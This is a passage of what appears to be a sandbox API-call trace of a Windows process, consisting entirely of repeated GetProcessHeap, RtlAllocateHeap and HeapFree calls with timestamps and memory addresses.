HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e188 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e188 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.505] GetProcessHeap () returned 0xe30000 [0059.505] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.506] GetProcessHeap () returned 0xe30000 [0059.506] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.507] GetProcessHeap () returned 0xe30000 [0059.507] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.507] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e698 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e698 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d9a8 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d9a8 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.508] GetProcessHeap () returned 0xe30000 [0059.508] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.509] GetProcessHeap () returned 0xe30000 [0059.509] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.509] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9da38 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9da38 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e218 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e218 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9deb8 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9deb8 | out: hHeap=0xe30000) returned 1 [0059.510] GetProcessHeap () returned 0xe30000 [0059.510] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.510] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e0f8 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e0f8 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e3c8 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e3c8 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd98 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd98 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e068 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e068 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e338 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e338 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e578 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e578 | out: hHeap=0xe30000) returned 1 [0059.511] GetProcessHeap () returned 0xe30000 [0059.511] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d918 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d918 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dbe8 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dbe8 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e2a8 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e2a8 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dd08 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dd08 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9dc78 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9dc78 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9db58 [0059.512] GetProcessHeap () returned 0xe30000 [0059.512] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9db58 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e7b8 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e7b8 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e728 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e458 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e458 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e608 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e608 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e4e8 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9e4e8 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9d888 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9d888 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9df48 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9df48 | out: hHeap=0xe30000) returned 1 [0059.513] GetProcessHeap () returned 0xe30000 [0059.513] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9de28 [0059.513] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xe9de28 | out: hHeap=0xe30000) returned 1 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x88) returned 0xe9e728 [0059.514] GetProcessHeap () returned 0xe30000 [0059.514] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, 